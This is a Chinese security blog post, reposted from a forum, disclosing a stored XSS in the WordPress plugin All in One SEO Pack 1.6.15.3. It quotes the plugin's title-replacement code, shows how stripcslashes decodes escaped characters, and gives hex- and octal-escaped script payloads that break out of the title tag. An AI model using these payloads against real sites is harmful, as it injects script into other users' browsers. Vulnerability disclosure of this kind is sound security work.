Wordpress Plugin[All-in-one-seo-pack] Xss

  • A+
所属分类:lcx

jackal 发表于 2012-12-29 17:16

前几天帮朋友更新下blog,顺便看下他的站安全,测试了下wordpress下的SEO插件.

http://wordpress.org/extend/plugins/

Most Popular >>

All in One SEO Pack 1.6.15.3

Downloaded 13,210,199 times

Seo插件允许你为每篇文章单独配置Title,Description,Keywords.

aioseop.class.php

后台主要提交Title,Description,Keywords

function wp_head()中过滤了Description和Keywords的双引号,没想到什么利用方法,主要看Title的利用.

";
        $title_tag_end = "";
        $len_start = strlen($title_tag_start);
        $len_end = strlen($title_tag_end);

        //这里转义出了问题
        $title = stripcslashes(trim($title));
        $start = strpos($content, $title_tag_start);
        $end = strpos($content, $title_tag_end);
        
        $title_start = $start;
        $title_end = $end;
        $orig_title = $title;
        
        if ($start && $end) {
                $header = substr($content, 0, $start + $len_start) . $title .  substr($content, $end);
        } else {
                // this breaks some sitemap plugins (like wpg2)
                //$header = $content . "$title";
                
                $header = $content;
        }
        
        return $header;
}

$content = 'mytitlemybody';
$title         = 'eviltitle';
$title         = 'eviltitle';
$title         = 'x3c/title>x3cscript>alert("xss");x3c/script>';
$title         = '74/title>74script>alert("xss");74/script>';
echo replace_title($content, $title);
?>

http://php.net/manual/zh/function.stripcslashes.php

返回反转义后的字符串。可识别类似 C 语言的 n,r,... 八进制以及十六进制的描述。

所以我们直接提交:

x3c/title>x3cscript>alert("xss");x3c/script>
74/title>74script>alert("xss");74/script>

成功触发Xss,如图:

Wordpress Plugin[All-in-one-seo-pack] Xss

Wordpress Plugin[All-in-one-seo-pack] Xss

三个鸡肋的地方:

1.需要安装此插件,-_-||

2.至少需要文章提交者的权限.

3.后台管理员管理文章列表时可以直接看到这个构造的标题并htmlspecialchars输出,容易暴露.

转自:https://www.t00ls.net/viewthread.php?tid=21482

文章来源于lcx.cc:Wordpress Plugin[All-in-one-seo-pack] Xss

相关推荐: 全能型反汇编引擎 - Capstone-Engine

Capstone是一个轻量级的多平台多架构支持的反汇编框架。支持包括ARM,ARM64,MIPS和x86/x64平台。今天1.0版本正式向公众开放下载,可以在http://www.capstone-engine.org/download.html获取到最新的代…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: